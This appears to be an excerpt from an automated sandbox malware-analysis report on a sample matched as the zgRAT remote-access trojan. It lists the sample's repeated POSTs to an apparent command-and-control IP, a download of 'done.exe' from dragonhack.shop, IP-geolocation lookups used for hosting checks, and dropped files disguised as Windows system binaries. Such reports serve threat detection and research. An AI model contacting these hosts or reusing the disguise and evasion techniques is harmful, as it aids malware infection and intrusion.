                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2504Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1992Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2504Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2504Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1980Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2504Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: global trafficHTTP traffic detected: GET /done.exe HTTP/1.1Host: dragonhack.shopConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Content-Type: application/jsonHost: ip-api.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                                Source: global trafficDNS traffic detected: DNS query: dragonhack.shop
                                Source: unknownHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                Source: powershell.exe, 0000001F.00000002.3012073469.000001CA2FDE3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3049977867.0000015FC586B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                                Source: powershell.exe, 00000026.00000002.3058103236.0000021336CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                Source: powershell.exe, 00000026.00000002.3079398788.0000021336D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micNb
                                Source: powershell.exe, 00000026.00000002.3058103236.0000021336CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.000001906200A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dragonhack.shop
                                Source: qmgr.db.49.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                Source: qmgr.db.49.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                Source: qmgr.db.49.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                Source: qmgr.db.49.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                Source: qmgr.db.49.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                Source: qmgr.db.49.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                Source: qmgr.db.49.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.00000190622DE000.00000004.00000800.00020000.00000000.sdmp, Wh2c6sgwRo.exe, 00000000.00000002.1609904365.00000190622F7000.00000004.00000800.00020000.00000000.sdmp, Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061E0B000.00000004.00000800.00020000.00000000.sdmp, d3yngi1q.wji.exe, 00000002.00000002.1641016699.0000000002F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp, Wh2c6sgwRo.exe, 00000000.00000002.1609904365.00000190622B2000.00000004.00000800.00020000.00000000.sdmp, Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061E0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
                                Source: d3yngi1q.wji.exe, 00000002.00000002.1636177791.0000000001520000.00000004.08000000.00040000.00000000.sdmp, d3yngi1q.wji.exe, 00000002.00000002.1641016699.0000000002F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                                Source: powershell.exe, 0000001D.00000002.2834190547.00000199CAEB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2794361649.000001CA27DB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2762678557.0000015FBD554000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2760012226.000001B5C96C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 0000001D.00000002.1758206662.00000199BB067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1751751567.000001CA17F67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1751139424.0000015FAD707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1751641992.000001B5B9879000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp, d3yngi1q.wji.exe, 00000002.00000002.1641016699.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1758206662.00000199BAE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1751751567.000001CA17D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1751139424.0000015FAD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1751641992.000001B5B9651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1750796355.000002131E8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 0000001D.00000002.1758206662.00000199BB067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1751751567.000001CA17F67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1751139424.0000015FAD707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1751641992.000001B5B9879000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: powershell.exe, 00000026.00000002.3058103236.0000021336CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
                                Source: powershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                Source: powershell.exe, 0000001D.00000002.1758206662.00000199BAE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1751751567.000001CA17D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1751139424.0000015FAD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1751641992.000001B5B9651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1750796355.000002131E8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                Source: powershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dragonhack.shop
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dragonhack.shop/done.exe
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                Source: svchost.exe, 00000031.00000003.1777211358.000002154D7D1000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.49.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                                Source: svchost.exe, 00000031.00000003.1777211358.000002154D760000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.49.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                                Source: powershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: powershell.exe, 00000026.00000002.3041543607.0000021336C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5V
                                Source: powershell.exe, 0000001D.00000002.2834190547.00000199CAEB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2794361649.000001CA27DB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2762678557.0000015FBD554000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2760012226.000001B5C96C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://www.ecosia.org/newtab/
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                                Source: unknownHTTPS traffic detected: 91.149.219.45:443 -> 192.168.2.8:49706 version: TLS 1.2
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWindow created: window name: CLIPBRDWNDCLASS

                                System Summary

                                barindex
                                Malicious sample detected (through community Yara rule)
                                Source: Wh2c6sgwRo.exe, type: SAMPLEMatched rule: Detects zgRAT Author: ditekSHen
                                Source: 0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile created: C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile created: C:\Windows\Help\Corporate\1156fbdc9c3eb4Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMPJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMPJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeCode function: 0_2_00007FFB4B2908AD0_2_00007FFB4B2908AD
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeCode function: 0_2_00007FFB4B2924370_2_00007FFB4B292437
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeCode function: 0_2_00007FFB4B2924900_2_00007FFB4B292490
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeCode function: 0_2_00007FFB4B2924880_2_00007FFB4B292488
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeCode function: 0_2_00007FFB4B2924700_2_00007FFB4B292470
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B299B902_2_00007FFB4B299B90
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B2967A62_2_00007FFB4B2967A6
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B281EC32_2_00007FFB4B281EC3
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B29073A2_2_00007FFB4B29073A
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B2975522_2_00007FFB4B297552
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B290AF32_2_00007FFB4B290AF3
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 37_2_00007FFB4B2A1EC337_2_00007FFB4B2A1EC3
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 41_2_00007FFB4B2C1EC341_2_00007FFB4B2C1EC3
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 47_2_00007FFB4B291EC347_2_00007FFB4B291EC3
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeCode function: 48_2_00007FFB4B2A1EC348_2_00007FFB4B2A1EC3
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 53_2_00007FFB4B2A1EC353_2_00007FFB4B2A1EC3
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 55_2_00007FFB4B281EC355_2_00007FFB4B281EC3
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.000001906202B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs Wh2c6sgwRo.exe
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.3007715987.000001907AB5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Ex vs Wh2c6sgwRo.exe
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019062026000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs Wh2c6sgwRo.exe
